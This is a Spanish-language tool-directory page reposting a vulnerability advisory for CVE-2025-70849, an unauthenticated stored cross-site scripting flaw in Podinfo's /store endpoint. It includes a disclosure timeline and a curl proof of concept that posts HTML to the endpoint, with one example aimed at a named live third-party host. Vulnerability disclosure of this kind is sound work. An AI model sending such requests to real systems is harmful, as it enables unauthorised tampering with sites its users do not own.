Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-70849 — CVE-2025-70849: XSS almacenado en Podinfo | Kitploit
Herramientas/GitHubGitHub/deaprojects/cve-2025-70849
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubdeaprojects/cve-2025-70849

CVE-2025-70849

CVE-2025-70849: XSS almacenado en Podinfo

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-70849: XSS almacenado en Podinfo

Resumen

Se identificó una vulnerabilidad de seguridad (CWE-79) en Podinfo, una aplicación web para demostrar microservicios de Kubernetes. La funcionalidad /store permite a usuarios no autenticados cargar contenido HTML/JS arbitrario, lo que conduce a XSS almacenado.

Detalles de la vulnerabilidad

  • ID de CVE: CVE-2025-70849
  • Producto: Podinfo
  • Endpoint afectado: /store
  • Tipo de vulnerabilidad: Cross-Site Scripting almacenado (XSS)
  • Versiones afectadas: <= 6.10.0

Prueba de concepto (PoC)

  1. Envía el payload malicioso:
    root@kitploit:~
    curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
    ejemplo con un objetivo en vivo:
    root@kitploit:~
    curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
imagen
  1. Accede al hash devuelto: https:///store/

    ejemplo: https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a

    imagen

Cronología

  • Descubrimiento: septiembre de 2025
  • Notificado al proveedor: 25 de octubre de 2025
  • Respuesta del proveedor: Confirmado; indicó que no hay un cronograma actual para la corrección.
  • Divulgación pública: febrero de 2026

Descargo de responsabilidad Esta investigación es solo con fines educativos.

AGRADECIMIENTOS :

Kazi Sabbir |

Severidad: Media 6.4

Descargar herramienta